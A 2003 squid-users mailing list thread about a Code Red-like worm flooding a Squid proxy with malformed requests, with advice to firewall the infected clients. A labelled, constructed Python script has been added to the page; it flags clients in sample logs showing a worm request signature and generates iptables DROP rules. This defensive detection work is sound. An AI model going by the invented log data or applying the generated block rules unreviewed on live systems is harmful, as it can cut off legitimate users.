Re: [squid-users] New Code Red?

From: Henrik Nordstrom <hno@dont-contact.us>
Date: 04 Apr 2003 12:53:12 +0200

There is not much that can be done for this kind of problem except to
block the offending client stations by firewalling.

One thing which may make the "400 Bad Request" worse for Squid is that
these also get logged in detail in cache.log. If you cannot firewall the
user then you might want to change debug_options to

  debug_options ALL,1 33,0

to temporarily disable most error reporting on client side request
processing.

Regards
Henrik

tor 2003-04-03 klockan 18.02 skrev Wei Keong:
> Hi,
>
> We are seeing a possible new Code Red. Each victim will flood a
> particular destination. Unlike the original one, this one does not
> send a proper HTTP method. Although Squid will return Bad Request, this
> attack will consume a lot of resources and bring down the Squid box...
>
> Has anybody caught the same thing? It seems to us that DENIED/403
> requires less processing than returning NONE/400 or NONE/411. If this is
> true, is there any way to deny these requests?
>
>
>
>
> Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
>
>
>
>
> Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.
>
>
>
> Thanks,
> Wei Keong

-- 
Free Squid-users support provided by Henrik Nordström <hno@squid-cache.org>
PayPal donations welcome if you consider my Free Squid support helpful.
https://www.paypal.com/xclick/business=hno%40squid-cache.org&cn=Comment
If you need commercial Squid support or cost effective Squid and
firewall appliances please refer to MARA Systems AB, Sweden
http://www.marasystems.com/, info@marasystems.com
Received on Fri Apr 04 2003 - 03:53:22 MST
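Henrik's advice above is to identify the infected client stations and firewall them. The following is an added example, not code from the thread or from the Squid project: a small Python script that scans Squid native-format access.log lines for clients that repeatedly trigger NONE/400 or NONE/411 replies (the signature Wei Keong reports) and emits the iptables rules an administrator could apply. The log lines, client addresses and the threshold are constructed for illustration; the iptables syntax and Squid's default port 3128 are assumptions about the deployment.

```python
import re
from collections import Counter

# Constructed sample of Squid native access.log lines (not taken from the thread).
# Fields: timestamp elapsed client code/status bytes method URL ident hierarchy type
SAMPLE_LOG = """\
1049377992.101      3 10.1.2.3 NONE/400 1586 GET /default.ida?XXXX - NONE/- text/html
1049377992.105      2 10.1.2.3 NONE/411 1601 GET /default.ida?XXXX - NONE/- text/html
1049377992.110      2 10.1.2.3 NONE/400 1586 GET /default.ida?XXXX - NONE/- text/html
1049377993.200    812 10.1.2.9 TCP_MISS/200 4210 GET http://www.example.com/ - DIRECT/192.0.2.10 text/html
1049377993.300      4 10.1.2.3 NONE/400 1586 GET /default.ida?XXXX - NONE/- text/html
1049377994.001      1 10.1.2.5 NONE/400 1586 GET - - NONE/- text/html
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<code>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)

# Squid answers malformed worm requests with NONE/400 or NONE/411 (see the thread).
SUSPECT_STATUSES = {"400", "411"}

def parse_line(line):
    """Parse one native-format access.log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_flooding_clients(log_text, threshold=3):
    """Return {client: count} for clients that produced at least `threshold`
    NONE/400 or NONE/411 replies, i.e. stations hammering the proxy with junk."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["code"] == "NONE" and rec["status"] in SUSPECT_STATUSES:
            counts[rec["client"]] += 1
    return {client: n for client, n in counts.items() if n >= threshold}

def firewall_rules(clients, port=3128):
    """Build iptables commands that drop the offending stations at the proxy port
    (assumed deployment detail: iptables on the Squid host, Squid on port 3128)."""
    return [f"iptables -I INPUT -s {c} -p tcp --dport {port} -j DROP"
            for c in sorted(clients)]

if __name__ == "__main__":
    offenders = find_flooding_clients(SAMPLE_LOG)
    for rule in firewall_rules(offenders):
        print(rule)
```

In production, feed the real access.log (or a tail of it) instead of SAMPLE_LOG and review the offender list before applying any rule; the threshold should be tuned to the site's normal rate of malformed requests.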

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:14:40 MST